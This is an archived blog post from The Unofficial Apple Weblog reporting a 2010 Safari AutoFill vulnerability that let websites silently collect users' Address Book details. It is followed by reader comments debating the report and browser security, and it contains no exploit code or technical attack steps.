Safari exploit gives your contact info to malicious websites
Safari itself ranks slightly better in the number of vulnerabilities found in 3rd party applications, taking the number two spot right after Mozilla's Firefox. It may not come as any surprise then that a major Safari exploit was publicly reported yesterday by Jeremiah Grossman, the founder of WhiteHat Security.
The exploit lets malicious sites retrieve your personal data from your Address Book in both Safari 4 & 5 if you have enabled the option to allow Safari to AutoFill web forms with your Address Book info. The exploit does not require the user to even see the forms, it can all happen automatically without you having any idea that you just gave the site your name, company, city, state, country, email and other form data you may have added to your Address Book entry.
It's important to note that this vulnerability does apply to Safari for Windows as well, but it will only grab the personal information you've explicitly typed into Safari directly.
Jeremiah also mentions that he did report this vulnerability privately to Apple on June 17th.
[Hat tip Techmeme & Ars Technica]
Share
Categories
In a report on security in the first half of 2010 Apple has claimed the top spot in the number of security vulnerabilities in their OS and...
Add a Comment
Someone else pointed out that there is a working demo, but even if there weren't the theory behind the attack doesn't push any boundaries - all the technologies it describes are well-established and predictable, unless Safari had some unknown defence in place against javascript input simulation.
I turned off autocomplete from address book the moment I saw this, and hope Apple sees it as a flaw and offers a fix.
I promise guys, I'll make sure not to write a rush post without having consumed some coffee yet. ;-)
/me embarrassed.
For what it's worth, I'm always happier to read stories later with more/better information than first with less. +1 for having presence amid criticism, Chris.
July 22 2010 at 11:18 PM Report abuse Permalink rate up rate down ReplySure I'm biased, everyone is biased. Personally, my bias is that while I've flirted with just about every browser out there Safari is my one true love (well, now that it has extensions. :)
I would also point out that other credible publications are reporting the list from that report with Apple on top for number, not severity, of security issues. This isn't some random nobody security company. Hit the Ars link, you don't get more credible then them.
You're right, there may not be a *malicious exploit* out in the wild but I think the demo of the exploit linked in his article should be classified as an exploit, as willyu34 already pointed out.
you are not suppose to believe everything from the Internet, that's why you have to do researches on claims.
If you did bother do ANY kind of research, or even read source article before you call the article bullshit, you'll realize that Jeremiah Grossman ALREADY have a WORKING DEMO which he'll be showing people at blackhat next week. It will show the web server receiving the address book information in the replies, without user interaction.
There's a reason I use 1Password instead of enabling autofill.
July 22 2010 at 3:10 PM Report abuse Permalink rate up rate down Replyyeah, REAL anonymous..
"JEREMIAH also mentions that he did report this vulnerability privately to Apple on June 17th."
From Secunia's website:
"Secunia provides free tools for the consumers as we want to ensure that PC users have easy access to reliable vulnerability management tools."
What market share has this free software got? Publicity off Apple's back?
So don't go to malicious sites...
July 22 2010 at 1:10 PM Report abuse Permalink rate up rate down ReplySorry, but the days were you only got viruses on adult and warez websites are long gone. Today usually respectable websites are being compromised either directly or for example through remotely loaded ad banners.
There was a couple stories including for example the NY times website using malicious code remotely loaded to attack visitors. The times reacted quickly, but the ad was still out there for a while.
T.
Good thing I use Chrome...
July 22 2010 at 1:08 PM Report abuse Permalink rate up rate down ReplyHot Apps on TUAW
Deals of the Day
more deals- Soulo Karaoke App and Wireless Mic for iPhone / iPad for $80 + free shipping
- Verizon Leather Sleeve for Tablets for $4 + free shipping
- Wicked Jaw Breaker Noise-Isolating In-Ear Headphones for $6 + free shipping
- Refurb Apple MacBook Air Laptops: 12" 64GB SSD for $699 + free shipping
- JVC Motion Sensing Clock Radio with Dual iPod Docks for $55 + free shipping
- Apple iPhone Headset with Mic for $4 + $2 s&h
Software Updates
more updates- EFI Firmware Update brings Lion Internet Recovery to 2010-model Macs
- OS X Lion 10.7.3 released with Safari 5.1.3, Wi-Fi bug fix
- Aperture updated to 3.2.2, addresses Photo Stream issue
- Apple updates Keynote to address Lion issues
- Google Search app gets new look on iPad
- Apple releases Apple TV Software Update 4.4.3
Featured Stories
more stories
Popular Stories
TUAW (or The Unofficial Apple Weblog) is a website devoted to tips, reviews, news, analysis and opinion on everything Apple.
14 Comments